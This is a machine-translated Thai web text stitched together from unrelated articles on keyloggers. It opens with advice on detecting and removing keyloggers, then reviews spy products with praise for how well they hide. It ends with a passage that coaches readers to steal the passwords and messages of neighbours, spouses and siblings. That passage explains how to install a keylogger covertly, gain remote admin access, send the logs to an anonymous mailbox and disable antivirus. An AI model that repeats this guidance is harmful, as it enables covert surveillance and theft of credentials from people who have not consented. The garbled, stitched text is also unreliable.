บันทึกของแป้นพิมพ์ คีย์ล็อกเกอร์ - คีย์ล็อกเกอร์ วิธีป้องกันตัวเองจากคีย์ล็อกเกอร์

วิธีค้นหาคีย์ล็อกเกอร์

ไม่ว่าคีย์ล็อกเกอร์จะฉลาดแค่ไหน แต่ก็ยังสามารถตรวจจับได้ มีหลายวิธี

  • ค้นหาตามลายเซ็น

วิธีนี้ช่วยให้คุณระบุการมีอยู่ของคีย์ล็อกเกอร์ได้อย่างแม่นยำ ทางเลือกที่ถูกต้องลายเซ็นสามารถลดความน่าจะเป็นของข้อผิดพลาดให้เป็นศูนย์ แต่เครื่องสแกนลายเซ็นสามารถตรวจจับวัตถุที่รู้จักและอธิบายไว้ในฐานข้อมูลอยู่แล้ว ดังนั้นฐานข้อมูลจึงต้องมีขนาดใหญ่และอัปเดตอยู่ตลอดเวลา


  • อัลกอริธึมการเรียนรู้แบบฮิวริสติก

วิธีนี้จะค้นหาคีย์ล็อกเกอร์ตามคุณลักษณะเฉพาะของมัน และช่วยให้คุณตรวจจับกับดักแป้นพิมพ์มาตรฐานได้ การศึกษาพบว่าหลายร้อย โปรแกรมที่ปลอดภัยซึ่งไม่ใช่คีย์ล็อกเกอร์ ให้ตั้งค่ากับดักเพื่อติดตามอินพุตของเมาส์และคีย์บอร์ด ตัวอย่างเช่นโปรแกรม Punto Switcher ที่รู้จักกันดีซึ่งเป็นซอฟต์แวร์สำหรับคีย์บอร์ดและเมาส์มัลติมีเดีย

  • การตรวจสอบฟังก์ชัน API ที่สายลับใช้

วิธีการนี้อิงจากการสกัดกั้นฟังก์ชันจำนวนหนึ่งที่ใช้โดยคีย์ล็อกเกอร์ เช่น SetWindowsHookEx, UnhookWindowsHookEx, GetAsyncKeyState, GetKeyboardState

ติดตามไดรเวอร์ กระบวนการ บริการที่ระบบใช้

วิธีการนี้เหมาะสำหรับการติดตามคีย์ล็อกเกอร์เท่านั้น กรณีการใช้งานที่ง่ายที่สุดคือการใช้โปรแกรมเช่น Kaspersky Inspector ซึ่งจะตรวจสอบลักษณะที่ปรากฏของไฟล์ใหม่ในระบบ

วิธีป้องกันตัวเองจากคีย์ล็อกเกอร์

บ่อยครั้งที่คีย์ล็อกเกอร์ที่รู้จักถูกเพิ่มลงในฐานข้อมูลแล้ว ดังนั้นวิธีการป้องกันจึงเหมือนกับซอฟต์แวร์ที่เป็นอันตราย:

  • การติดตั้งผลิตภัณฑ์ป้องกันไวรัส
  • การดูแลรักษาฐานข้อมูลให้ทันสมัย

เป็นที่น่าสังเกตว่าโปรแกรมป้องกันไวรัสส่วนใหญ่จัดประเภทคีย์ล็อกเกอร์เป็นซอฟต์แวร์ที่อาจเป็นอันตราย และจำเป็นต้องชี้แจงที่นี่ว่าในการตั้งค่าเริ่มต้น ผลิตภัณฑ์ป้องกันไวรัสตรวจพบว่ามีโปรแกรมประเภทนี้อยู่ ถ้าไม่เช่นนั้น คุณควรทำการตั้งค่าด้วยตนเองเพื่อป้องกันตัวเองจากสปายแวร์ทั่วไปส่วนใหญ่

โดยทั่วไป เนื่องจากคีย์ล็อกเกอร์มีจุดมุ่งหมายเพื่อสอดแนมข้อมูลที่เป็นความลับ คุณจึงควรใช้ ด้วยวิธีดังต่อไปนี้ความปลอดภัย:

การใช้รหัสผ่านครั้งเดียว/การตรวจสอบสิทธิ์แบบสองปัจจัย

การใช้ระบบป้องกันเชิงรุกซึ่งช่วยให้คุณเตือนผู้ใช้เกี่ยวกับการติดตั้ง/การเปิดใช้งานโปรแกรมคีย์ล็อกเกอร์

การใช้งาน แป้นพิมพ์เสมือน ซึ่งแสดงแป้นพิมพ์บนหน้าจอเป็นรูปภาพช่วยให้คุณสามารถป้องกันตัวเองจากทั้งซอฟต์แวร์และฮาร์ดแวร์สอดแนม

ค้นหาและลบคีย์ล็อกเกอร์

มีวิธีใดบ้างที่จะป้องกันตนเองจากวิญญาณชั่วร้ายนี้?

  • ใดๆ โปรแกรมป้องกันไวรัส
  • โปรแกรมอรรถประโยชน์ที่มีกลไกการค้นหาลายเซ็นและการศึกษาพฤติกรรม (เช่น AVZ)
  • ยูทิลิตี้และโปรแกรมที่มุ่งตรวจจับคีย์ล็อกเกอร์และบล็อกการทำงาน วิธีการป้องกันนี้มีประสิทธิภาพมากที่สุด เนื่องจากตามกฎแล้วซอฟต์แวร์นี้จะบล็อกคีย์ล็อกเกอร์เกือบทุกประเภท

เป็นที่น่าสังเกตว่าซอฟต์แวร์ที่มุ่งจับคีย์ล็อกเกอร์มีคุณสมบัติสองประการ: ซอฟต์แวร์ประเภทนี้ส่วนใหญ่ได้รับการจ่ายเงินและไม่ค่อยมีภาษารัสเซีย

ตัวอย่างเช่น ซอฟต์แวร์ฟรีภาษาอังกฤษ Advanced Spyware Remover จะกำจัด โปรแกรมโฆษณา, โปรแกรมโทรออก, สปายแวร์, คีย์ล็อกเกอร์ ฯลฯ

การติดตั้งเป็นมาตรฐาน ควรคลิก "ถัดไป" ซึ่งอาจเกิดข้อผิดพลาดได้ยาก หลังการติดตั้ง คุณได้รับพร้อมท์ให้รันโปรแกรม หากต้องการสแกน ให้คลิก “สแกนทันที”

อย่างไรก็ตาม เป็นที่น่าสังเกตว่าโปรแกรมไม่ได้รับการอัพเดตเป็นเวลา 3 ปีแล้ว

โดยทั่วไปโปรแกรมนี้จะตรวจสอบรีจิสทรีของระบบว่ามีคีย์อยู่ในนั้นหรือไม่ มัลแวร์. อรรถประโยชน์ก็มีบ้าง ฟังก์ชั่นซึ่งจะทำให้คุณสามารถแสดงรายการโปรแกรมที่โหลดเมื่อเริ่มต้นระบบได้ ระบบปฏิบัติการ(“HiJack Scan→Startup“), แสดงรายการบริการ, แสดงพอร์ตที่ใช้งานอยู่, ดู “คุกกี้” อินเทอร์เน็ตเอ็กซ์พลอเรอร์เป็นต้น หลังจากการสแกน หน้าต่างที่คล้ายกันจะปรากฏขึ้น:

หากคุณใส่ใจกับสิ่งที่ใหม่กว่า คุณสามารถใช้ Spyware Terminator 2012 ได้ (แม้ว่าจะไม่ใช่ฟรีก็ตาม) ยูทิลิตี้นี้สามารถตรวจจับและลบมัลแวร์ได้เกือบทุกประเภท ระบบความปลอดภัยในตัวเปิดใช้งานการป้องกันแอปพลิเคชันและระบบและตรวจสอบยูทิลิตี้ที่โต้ตอบกับเครือข่ายโดยตรง

  • การสกัดกั้น คลิปบอร์ด,
  • สกัดกั้นการกดแป้นพิมพ์
  • สกัดกั้นข้อความจากหน้าต่าง

และอีกมากมาย Anti-keylogger ไม่ได้ใช้ฐานข้อมูลลายเซ็น เนื่องจากใช้เฉพาะอัลกอริธึมการวิเคราะห์พฤติกรรมเท่านั้น Anti-keylogger สามารถป้องกันการโจมตีแบบกำหนดเป้าหมายซึ่งเป็นอันตรายมากและเป็นที่นิยมในหมู่อาชญากรไซเบอร์ โดยเฉพาะอย่างยิ่งในการต่อสู้กับคีย์ล็อกเกอร์โดยอิงจากการใช้กับดัก การโพลแบบวนรอบ และไดรเวอร์ตัวกรองแป้นพิมพ์

Anti-keylogger มีตัวเลือกฟรีซึ่งจำกัดด้วยเวลาใช้งาน - 10 เซสชันการทำงาน แต่ละเซสชันใช้เวลา 2 ชั่วโมง ซึ่งเพียงพอสำหรับการตรวจสอบพีซีของคุณในแต่ละครั้ง

แล้วเรามีอะไรบ้าง:

  1. คีย์ล็อกเกอร์ถูกวางตลาดว่าเป็นซอฟต์แวร์ที่ถูกกฎหมาย แต่ส่วนใหญ่สามารถใช้เพื่อขโมยข้อมูลส่วนบุคคลของผู้ใช้ได้
  2. ปัจจุบันคีย์ล็อกเกอร์และฟิชชิ่ง ฯลฯ ได้กลายเป็นหนึ่งในวิธีการหลักในการฉ้อโกงทางอิเล็กทรอนิกส์
  3. มีมัลแวร์ที่มีฟังก์ชันการทำงานของคีย์ล็อกเกอร์เพิ่มมากขึ้น
  4. การจำหน่ายซอฟต์แวร์คีย์ล็อกเกอร์ที่ใช้เทคโนโลยีรูทคิท ซึ่งทำให้ผู้ใช้และโปรแกรมสแกนป้องกันไวรัสมองไม่เห็น
  5. การตรวจจับการจารกรรมโดยใช้คีย์ล็อกเกอร์ต้องใช้เครื่องมือรักษาความปลอดภัยเฉพาะทาง
  6. ความจำเป็นในการป้องกันหลายระดับ (ผลิตภัณฑ์ป้องกันไวรัสที่มีฟังก์ชั่นการตรวจจับซอฟต์แวร์ที่เป็นอันตราย เครื่องมือป้องกันเชิงรุก แป้นพิมพ์เสมือน)

แสดงความคิดเห็นของคุณ!

หลากหลาย สปายแวร์มีความจำเป็นในสภาวะที่ผู้คนจำนวนมากสามารถเข้าถึงคอมพิวเตอร์เครื่องเดียวได้

ในสถานการณ์เหล่านี้ ผู้ใช้อาจต้องการทราบว่าไซต์ใดถูกเยี่ยมชมจากคอมพิวเตอร์ของเขา (เช่น โดยเด็ก ๆ) บัตรเครดิตถูกขโมยโดยใช้รหัสผ่านที่บันทึกไว้หรือไม่ เป็นต้น เพื่อชี้แจงปัญหาเหล่านี้ จึงจำเป็น

การตรวจสอบของเราจะช่วยให้คุณตัดสินใจได้ดีที่สุด

คุณสมบัติที่เลือกได้

คีย์ล็อกเกอร์คืออะไรกันแน่? นี่เป็นโปรแกรมที่ไม่เกี่ยวข้องโดยตรงกับคีย์บอร์ด

มีการติดตั้งไว้ในหน่วยความจำของคอมพิวเตอร์และดำเนินการอยู่ บ่อยครั้ง สัญญาณของกิจกรรมจะไม่ปรากฏบนคอมพิวเตอร์ เว้นแต่คุณจะมองหาสัญญาณเหล่านั้นโดยเฉพาะ

โปรแกรมดังกล่าวโต้ตอบกับแป้นพิมพ์ทางอ้อมนั่นคือทำงานร่วมกับโปรแกรมบนพีซีที่แปลงสัญญาณที่โปรเซสเซอร์ได้รับอันเป็นผลมาจากการกดปุ่มเป็นข้อความเมื่อพิมพ์

นั่นคือการทำงานของซอฟต์แวร์ดังกล่าวมีวัตถุประสงค์เพื่อรวบรวมข้อมูลที่ป้อนผ่านแป้นพิมพ์

มีสาธารณูปโภคดังกล่าว ประเภทต่างๆ– ด้วยความช่วยเหลือจากบางส่วน คุณสามารถดูข้อความทั้งหมดที่พิมพ์จากแป้นพิมพ์ได้ และบางส่วน – เฉพาะข้อความที่พิมพ์ในเบราว์เซอร์หรือในแอปพลิเคชันที่เลือกเท่านั้น

บางโปรแกรมมีความสามารถในการกำหนดค่าตัวบ่งชี้ดังกล่าว แต่บางโปรแกรมไม่มี

พวกเขายังแตกต่างกันในระดับความลับ ตัวอย่างเช่น กิจกรรมของบางคนชัดเจน มีทางลัดยังคงอยู่บนเดสก์ท็อป เป็นต้น โปรแกรมเหมาะสำหรับการติดตามกิจกรรมต่างๆ ของเด็กๆ เช่น

ร่องรอยของการปรากฏตัวและกิจกรรมของผู้อื่นนั้นไม่สามารถสังเกตเห็นได้ชัดเจน - พวกมันซ่อนเร้นและเหมาะสำหรับการติดตั้งบนคอมพิวเตอร์ของผู้อื่นเมื่อจำเป็นต้องซ่อนความเป็นจริงของการติดตั้งจากผู้ใช้บุคคลที่สาม

ด้วยความหลากหลายดังกล่าว การเลือกซอฟต์แวร์ที่เหมาะสมที่สุดอาจเป็นเรื่องยากทีเดียว

ใน วัสดุนี้ท็อปนำเสนอ โปรแกรมที่ดีที่สุดซึ่งสามารถใช้เพื่อจุดประสงค์นี้ได้ มันง่ายกว่าที่จะเลือกสิ่งที่ถูกต้องในหมู่พวกเขา

ข้อมูลจำเพาะ

เพื่อให้กระบวนการเลือกซอฟต์แวร์ง่ายขึ้น ตารางด้านล่างจะแสดงคุณลักษณะเปรียบเทียบหลักของโปรแกรมทั้งหมดที่รวมอยู่ใน TOP

ชื่อประเภทใบอนุญาตประเภทของข้อมูลที่เก็บรวบรวมการทำงานออกแบบ
SC-KeyLogฟรีทั้งหมดกว้างตัวย่อ
WideStep คีย์ล็อกเกอร์ที่มีประโยชน์ฟรี/จ่ายเงินทั้งหมดกว้างปรับปรุงแล้ว
สายลับตัวจริงจ่ายทั้งหมดกว้างมากมาตรฐาน
EliteKeyloggerจ่ายทั้งหมดกว้างมาตรฐาน
หนู!ฟรี/จ่ายเงินน้อยกว่าครั้งก่อนค่อนข้างกว้างไม่สวยงาม
สไปโกฟรีขึ้นอยู่กับรุ่นขึ้นอยู่กับรุ่นรูปลักษณ์มาตรฐานของ Windows
Ardamax คีย์ล็อกเกอร์ 2.9.1ฟรีจากแป้นพิมพ์แคบลงตัวย่อ
การตรวจสอบส่วนบุคคล NS Keylogger 3.8.1ฟรีทั้งหมดแคบลงตัวย่อ
เคจีบี สปายจ่ายจากคีย์บอร์ด+เปิดโปรแกรมแคบเรียบง่าย
โกลเด้นคีย์ล็อกเกอร์ 1.32ฟรีจากแป้นพิมพ์แคบมากเรียบง่าย

จากคุณลักษณะจากตารางนี้ ทำให้ง่ายต่อการเลือกโปรแกรมที่เหมาะกับความต้องการเฉพาะของคุณมากที่สุด

ยูทิลิตี้เหล่านี้มีรายละเอียดเพิ่มเติมด้านล่าง

SC-KeyLog

นี่เป็นโปรแกรมสอดแนมขนาดใหญ่และใช้งานได้จริงซึ่งแจกฟรีโดยไม่คิดค่าใช้จ่าย

นอกเหนือจากข้อมูลการติดตามที่ป้อนจากแป้นพิมพ์โดยเฉพาะแล้ว ยังสามารถรวบรวมที่อยู่ของเว็บไซต์ที่เยี่ยมชม รหัสผ่าน เปิดหน้าต่างในเบราว์เซอร์

ให้ ข้อมูลครบถ้วนเกี่ยวกับการกระทำทั้งหมดที่ทำบนคอมพิวเตอร์ ในกรณีนี้ สามารถดูไฟล์ที่สร้างขึ้นจากระยะไกลได้จากอุปกรณ์อื่น

  • โอกาส การเข้าถึงระยะไกลไปยังไฟล์จากอุปกรณ์อื่น
  • ไม่มีร่องรอยของกิจกรรมของโปรแกรมบนคอมพิวเตอร์ด้วยการตั้งค่าที่ถูกต้อง
  • ข้อมูลที่รวบรวมหลากหลาย - สามารถเข้าถึงข้อมูลเกี่ยวกับการดำเนินการเกือบทั้งหมดบนพีซีได้
  • บันทึกรหัสผ่านได้สูงสุด NT0 เท่านั้น
  • เมนูเรียบง่ายเกินไปและการออกแบบที่ไม่สวยงาม
  • รูปแบบที่ค่อนข้างไม่สะดวกในการแสดงผลลัพธ์

ผู้ใช้ที่ใช้งานซอฟต์แวร์นี้พูดอย่างไร? “ผู้ใช้มองไม่เห็นอย่างแน่นอน” “ข้อมูลมาถึงทางอีเมลเป็นประจำ”

WideStep คีย์ล็อกเกอร์ที่มีประโยชน์

แอปพลิเคชั่นนี้แจกฟรี เวอร์ชันที่ต้องชำระเงินเต็มมีราคา $35

เป็นโปรแกรมที่น่าสนใจและใช้งานได้จริงซึ่งคุ้มค่าเงินหากคุณยินดีจ่าย

คุณสมบัติที่โดดเด่น– ความสามารถในการส่งข้อมูลที่บันทึกไว้ตามความถี่ที่กำหนด ไม่เช่นนั้นก็จะทำงานได้ดี และมักจะเสถียรกว่าโปรแกรมอื่น ๆ ในรายการนี้

  • การรวบรวมข้อมูลประเภทต่างๆ
  • การมองไม่เห็นงานบนคอมพิวเตอร์ของผู้ใช้โดยสมบูรณ์
  • อินเทอร์เฟซและการควบคุมที่เรียบง่าย
  • การออกแบบดีกว่าโปรแกรมก่อนหน้า แต่ก็ยังไม่ยอดเยี่ยมนัก
  • รูปแบบการแสดงผลลัพธ์ไม่สะดวก
  • เวอร์ชันที่ต้องชำระเงินมีราคาค่อนข้างแพง

ความคิดเห็นของผู้ใช้เกี่ยวกับซอฟต์แวร์นี้มีดังนี้ “โปรแกรมที่สะดวก เรียบง่าย และใช้งานได้จริง ค่อนข้างมองไม่เห็นเมื่อทำงาน”

สายลับตัวจริง

มันใช้งานได้จริงและซับซ้อน โปรแกรมที่ต้องชำระเงินราคา 600 รูเบิล อย่างไรก็ตาม มันมีเวอร์ชันสาธิตที่ให้บริการฟรี

คุณสมบัติของซอฟต์แวร์นี้– ความสามารถในช่วงเวลาที่กำหนด

ซึ่งจะช่วยแก้ปัญหาการป้อนรหัสผ่าน/คีย์กราฟิกซึ่ง เมื่อเร็วๆ นี้เริ่มแพร่หลายออกไป

  • ข้อมูลหลายประเภทที่รวบรวมรวมถึงความสามารถในการจับภาพหน้าจอจากหน้าจอในช่วงเวลาที่กำหนด
  • อื่นๆอีกมากมาย ฟังก์ชั่นเพิ่มเติมและคุณสมบัติ;
  • บันทึกไม่เพียงแต่การกระทำเท่านั้น แต่ยังบันทึกเวลาที่กระทำด้วย
  • เข้ารหัสบันทึกที่สร้างขึ้น
  • ระยะเวลาการทำงาน (การรวบรวมข้อมูล) ในเวอร์ชันสาธิตฟรีคือ 40 นาที
  • การกระจายการชำระเงินแม้ว่าจะเป็นราคาที่สมเหตุสมผลมากหรือน้อยก็ตาม
  • น้ำหนักของโปรแกรมค่อนข้างมาก

รีวิวจากผู้ใช้เกี่ยวกับ แอปพลิเคชันนี้คือ “โปรแกรมนี้ยอดเยี่ยมมาก โปรแกรมเมอร์เก่งมาก!”

EliteKeylogger

โปรแกรมเสียเงินอย่างเพียงพอ ในราคาที่สูง – 69 ดอลลาร์ มันทำงานโดยตรวจไม่พบอย่างสมบูรณ์บนพีซีในโหมดระดับต่ำ ทำให้ตรวจไม่พบเกือบทั้งหมด

คุณสมบัติที่น่าสนใจและสะดวกสบาย– การเปิดตัวซอฟต์แวร์อัตโนมัติเกิดขึ้นพร้อมกันกับการเปิดตัวระบบเอง

เป็นการยากที่จะตรวจจับหรือตรวจไม่พบเลยแม้แต่กับแอนตี้คีย์ล็อกเกอร์แบบพิเศษก็ตาม

  • การกระทำที่ซ่อนอยู่โดยสิ้นเชิงและตรวจจับได้ยาก
  • รูปแบบการทำงานประเภทไดรเวอร์ระดับต่ำและการเริ่มทำงานอัตโนมัติเมื่อระบบบู๊ต
  • นอกจากนี้ยังติดตามการกดไม่เพียงแต่ปุ่มหลักเท่านั้น แต่ยังรวมถึงปุ่มบริการบนแป้นพิมพ์ด้วย
  • ระบบที่ค่อนข้างซับซ้อนสำหรับการติดตั้งโปรแกรมบนพีซี
  • โปรแกรมนี้มีราคาแพง แต่คุณสามารถค้นหาเวอร์ชันแฮ็กเก่าได้บนอินเทอร์เน็ตรัสเซีย
  • ระบบที่ค่อนข้างซับซ้อนของการตั้งค่าแต่ละโปรแกรมซึ่งอย่างไรก็ตามจะปรับตัวเองให้เหมาะสม

ผู้ใช้พูดอะไรเกี่ยวกับซอฟต์แวร์นี้? “โปรแกรมดี”, “เจ็ทล็อกเกอร์ยังน้อยไปหน่อย”

หนู!

ค่อนข้างเป็นยูทิลิตี้ที่ใช้งานได้ทั่วไปและเป็นที่นิยมพร้อมใบอนุญาตแบบชำระเงิน

อย่างไรก็ตาม สำหรับการใช้งานส่วนตัว จะมีเวอร์ชันสาธิตฟรีให้บริการในระยะเวลาจำกัด

โปรแกรมนี้ง่ายมาก– ผู้ใช้ขั้นสูงสามารถเขียนแบบเดียวกันได้ อย่างไรก็ตามไม่สามารถตรวจพบได้โดยโปรแกรมป้องกันไวรัสและ โปรแกรมพิเศษการตรวจจับซอฟต์แวร์ดังกล่าว

  • ความเรียบง่าย ฟังก์ชันการทำงาน และความเสถียรสูง
  • น้ำหนักไฟล์ขั้นต่ำและพื้นที่ว่างบนคอมพิวเตอร์
  • การตั้งค่าค่อนข้างมาก
  • การออกแบบที่ค่อนข้างไม่น่าพอใจ ทำด้วยสีดำ สีขาว และสีแดง
  • ฟังก์ชั่นค่อนข้างแคบกว่าในโปรแกรมที่อธิบายไว้ก่อนหน้านี้
  • การดูบันทึกไม่สะดวกและอินเทอร์เฟซและการใช้งานโดยทั่วไปไม่สะดวก

ผู้ใช้พูดถึงโปรแกรมนี้ดังต่อไปนี้: “มันทำงานได้อย่างเสถียร แต่ค่อนข้างเรียบง่าย” “โปรแกรมนี้ดี ช่วยให้คุณสามารถรวบรวมข้อมูลโดยไม่มีใครสังเกตเห็น”

สไปโก

นี่คือคีย์ล็อกเกอร์ใหม่โดยพื้นฐาน ออกแบบมาเพื่อทำงานและพัฒนาโดยโปรแกรมเมอร์ชาวรัสเซีย

คีย์ล็อกเกอร์เป็นโปรแกรมที่อ่านคีย์ที่กดแล้วบันทึกเป็นไฟล์ ในอนาคต คุณสามารถดูสิ่งที่บุคคลนั้นเขียนที่คอมพิวเตอร์ ข้อความที่เขาพิมพ์ และรหัสผ่านที่เขาป้อน อีกชื่อหนึ่งของคีย์ล็อกเกอร์คือคีย์ล็อกเกอร์ มาจากภาษาอังกฤษว่า "คีย์ล็อกเกอร์" ซึ่งแปลว่า "ปุ่มบันทึก" อย่างแท้จริง

ในโปรแกรม NeoSpy ฟังก์ชั่น keylogger จะถูกเปิดใช้งานตามค่าเริ่มต้น ในโหมดนี้ โปรแกรมจะบันทึกข้อความ ชุดคีย์ลัด และรหัสผ่านที่พิมพ์บนแป้นพิมพ์ การจัดการการตั้งค่าคีย์ล็อกเกอร์จะอยู่ในเมนู "การตั้งค่าการติดตาม" - "บันทึกการบันทึก" - "คีย์บอร์ด" คุณสามารถเลือกหนึ่งในสองโหมดการทำงานของโปรแกรม: มาตรฐานและทางเลือก ขอแนะนำให้ใช้ตัวเลือกมาตรฐานในกรณี 99% แต่ในกรณีที่มีข้อขัดแย้งกับโปรแกรมป้องกันไวรัสของคุณ ซอฟต์แวร์คุณสามารถเปิดใช้งานโหมด alt ได้

การตั้งค่าคีย์ล็อกเกอร์


บันทึกของแป้นพิมพ์จะถูกบันทึกในรูปแบบเต็มเสมอ รวมถึงคีย์บริการด้วย ตัวอย่างของบันทึกดังกล่าวสามารถดูได้ในภาพประกอบ ขณะดูรายงาน คุณสามารถปิดจอแสดงผลได้ อักขระที่ไม่พิมพ์และดูบันทึกเป็นข้อความธรรมดาที่เข้าถึงได้มากขึ้นสำหรับการอ่านฟรี


ตัวอย่างคีย์ล็อกเกอร์

เพื่อให้ทำงานกับรายงานได้ง่ายขึ้น รหัสผ่านที่พิมพ์จะถูกเน้นในรายการการกดแป้นพิมพ์ วิธีนี้ทำให้คุณสามารถค้นหารหัสผ่านของบุตรหลาน และปกป้องเขาจากคนรู้จักที่ไม่พึงประสงค์ หากจำเป็น หากใช้โปรแกรม NeoSpy ในองค์กรเพื่อตรวจสอบพนักงาน ดังนั้นกฎหมายของประเทศส่วนใหญ่จึงห้ามไม่ให้มีการเก็บรวบรวมข้อมูลส่วนบุคคลและการติดต่อสื่อสาร ดังนั้นตัวเลือกนี้จะต้องถูกปิดใช้งาน หรือพนักงานจะต้องได้รับแจ้งเป็นลายลักษณ์อักษรเกี่ยวกับการควบคุมโดยฝ่ายบริหารและ ความไม่ยอมรับของการใช้คอมพิวเตอร์ในองค์กรเพื่อการติดต่อส่วนตัว

ใครในพวกเราไม่อยากรู้สึกเหมือนเป็นแฮ็กเกอร์เจ๋งๆ อย่างน้อยหนึ่งครั้งและทำลายบางสิ่งเป็นอย่างน้อย? :) แม้ว่าจะไม่ใช่ก็ตาม เรามาดูกันดีกว่าว่าการได้รับรหัสผ่านจากเมล/โซเชียลเน็ตเวิร์กของคุณจะดีแค่ไหน เครือข่ายเพื่อน ภรรยา/สามี เพื่อนร่วมห้อง คิดถึงทุกคนอย่างน้อยหนึ่งครั้ง :) ใช่แล้วคุณต้องเริ่มต้นที่ไหนสักแห่ง! ส่วนสำคัญของการโจมตี (การแฮ็ก) เกี่ยวข้องกับการแพร่เชื้อคอมพิวเตอร์ของเหยื่อด้วยสิ่งที่เรียกว่าคีย์ล็อกเกอร์ (สปายแวร์)

ดังนั้นในบทความวันนี้เราจะพูดถึงอะไร โปรแกรมฟรีเพื่อตรวจสอบคอมพิวเตอร์บน ที่ใช้หน้าต่าง ซึ่งคุณสามารถดาวน์โหลดเวอร์ชันเต็มได้ วิธีแพร่เชื้อคอมพิวเตอร์ของเหยื่อ และฟีเจอร์การใช้งานของพวกเขามีอะไรบ้าง

แต่ก่อนอื่นขอแนะนำเล็กน้อย

คีย์ล็อกเกอร์คืออะไรและทำไมจึงจำเป็น?

ฉันคิดว่าคุณเองก็เดาได้ว่ามันคืออะไร ตามกฎแล้วมันเป็นโปรแกรมประเภทหนึ่งที่ซ่อนอยู่ (แม้ว่าจะไม่เป็นเช่นนั้นเสมอไป) ที่ติดตั้งบนคอมพิวเตอร์ของเหยื่อหลังจากนั้นจะบันทึกการกดแป้นพิมพ์ทั้งหมดบนโหนดนี้ นอกจากนี้นอกเหนือจากการคลิกแล้วมักจะบันทึกสิ่งต่อไปนี้: วันที่และเวลาของการคลิก (การกระทำ) และโปรแกรมที่ทำการกระทำเหล่านี้ (เบราว์เซอร์รวมถึงที่อยู่เว็บไซต์ (ไชโยเราจะเห็นรหัสผ่านทันทีว่ารหัสผ่านอะไร) มีไว้เพื่อ!); แอปพลิเคชันในเครื่อง บริการระบบ (รวมถึงรหัสผ่านเข้าสู่ระบบ Windows) ฯลฯ )

จากที่นี่ปัญหาหนึ่งที่มองเห็นได้ทันที: ฉันเข้าถึงคอมพิวเตอร์ของเพื่อนบ้านได้สองสามนาทีและฉันต้องการรับรหัสผ่านของเธอจาก VK! ฉันติดตั้งโปรแกรมมหัศจรรย์และส่งคืนคอมพิวเตอร์ ฉันจะค้นหารหัสผ่านในภายหลังได้อย่างไร กำลังมองหาวิธีเอาคอมพิวเตอร์ไปจากเธออีกครั้งหรือไม่? ข่าวดีก็คือ: มักจะไม่ คีย์ล็อกเกอร์ส่วนใหญ่ไม่เพียงแต่สามารถจัดเก็บฐานข้อมูลการดำเนินการที่สะสมทั้งหมดไว้ในเครื่องเท่านั้น แต่ยังส่งจากระยะไกลได้อีกด้วย มีหลายตัวเลือกในการส่งบันทึก:

  • อีเมลประจำบ้าน (อาจมีหลายรายการ) เป็นตัวเลือกที่สะดวกที่สุด
  • เซิร์ฟเวอร์ FTP (ใครมี);
  • เซิร์ฟเวอร์ SMB (แปลกใหม่และไม่สะดวกมาก)
  • แฟลชไดรฟ์แบบคงที่ (คุณเสียบเข้ากับพอร์ต USB ของคอมพิวเตอร์ของเหยื่อ และบันทึกทั้งหมดจะถูกคัดลอกไปที่นั่นโดยอัตโนมัติในโหมดมองไม่เห็น!)

ทำไมทั้งหมดนี้ถึงจำเป็น? ฉันคิดว่าคำตอบนั้นชัดเจน นอกเหนือจากการขโมยรหัสผ่านซ้ำๆ แล้ว คีย์ล็อกเกอร์บางตัวยังสามารถทำสิ่งดีๆ อื่นๆ ได้อีกมากมาย:

  • การบันทึกการติดต่อสื่อสารในเครือข่ายโซเชียลที่ระบุ เครือข่ายหรือโปรแกรมส่งข้อความด่วน (เช่น Skype)
  • การจับภาพหน้าจอของหน้าจอ
  • ดู/บันทึกข้อมูลเว็บแคม (ซึ่งน่าสนใจมาก)

จะใช้คีย์ล็อกเกอร์ได้อย่างไร?

และนี่เป็นคำถามที่ยาก คุณต้องเข้าใจว่าการค้นหาคีย์ล็อกเกอร์ที่ดี สะดวก ใช้งานได้จริงนั้นไม่เพียงพอ

ดังนั้น, สิ่งที่จำเป็นสำหรับโปรแกรมสอดแนมในการทำงานให้ประสบความสำเร็จ?:

  • ผู้ดูแลระบบเข้าถึงคอมพิวเตอร์ระยะไกล
    ยิ่งไปกว่านั้น นี่ไม่ได้หมายถึงการเข้าถึงทางกายภาพเสมอไป คุณสามารถเข้าถึงได้ง่ายผ่าน RDP (บริการเดสก์ท็อประยะไกล) ทีมวิวเวอร์; AmmyAdmin ฯลฯ
    ตามกฎแล้วประเด็นนี้เกี่ยวข้องกับความยากลำบากที่ยิ่งใหญ่ที่สุด อย่างไรก็ตาม ฉันเพิ่งเขียนบทความเกี่ยวกับวิธีรับสิทธิ์ผู้ดูแลระบบใน Windows
  • อีเมลที่ไม่ระบุชื่อ / ftp (ซึ่งคุณจะไม่ถูกระบุ)
    แน่นอนว่าหากคุณกำลังทำลายป้าชูราเพื่อเพื่อนบ้าน คุณสามารถละเว้นจุดนี้ได้อย่างปลอดภัย เหมือนกับในกรณีที่คุณมีคอมพิวเตอร์ของเหยื่ออยู่เสมอ (ค้นหารหัสผ่านของพี่ชาย/น้องสาวของคุณ)
  • ขาดโปรแกรมป้องกันไวรัสที่ใช้งานได้ / ระบบภายในการป้องกันหน้าต่าง
    คีย์ล็อกเกอร์สาธารณะส่วนใหญ่ (ซึ่งจะกล่าวถึงด้านล่าง) เป็นที่รู้จักของซอฟต์แวร์ป้องกันไวรัสส่วนใหญ่ (แม้ว่าจะมีไวรัสตัวบันทึกที่ติดตั้งอยู่ในเคอร์เนลระบบปฏิบัติการหรือไดรเวอร์ระบบ และโปรแกรมป้องกันไวรัสไม่สามารถตรวจจับหรือทำลายไวรัสเหล่านั้นได้อีกต่อไป แม้ว่าจะมีไวรัสดังกล่าวก็ตาม ตรวจพบพวกเขา) เนื่องจากข้างต้น ซอฟต์แวร์ป้องกันไวรัส ถ้ามี จะต้องถูกทำลายอย่างไร้ความปราณี นอกจากแอนตี้ไวรัสแล้ว ระบบเช่น วินโดวส์ ดีเฟนเดอร์(สิ่งเหล่านี้ปรากฏครั้งแรกใน Windows 7 เป็นต้นไป) พวกเขาตรวจจับกิจกรรมที่น่าสงสัยในซอฟต์แวร์ที่ทำงานบนคอมพิวเตอร์ คุณสามารถค้นหาข้อมูลเกี่ยวกับวิธีการกำจัดพวกมันบน Google ได้อย่างง่ายดาย

บางทีสิ่งเหล่านี้อาจเป็นเงื่อนไขที่จำเป็นและเพียงพอสำหรับความสำเร็จของคุณในด้านการขโมยรหัสผ่าน / จดหมายโต้ตอบ / รูปภาพของผู้อื่นหรือสิ่งอื่นใดที่คุณต้องการบุกรุก

มีสปายแวร์ประเภทใดบ้าง และฉันสามารถดาวน์โหลดได้ที่ไหน?

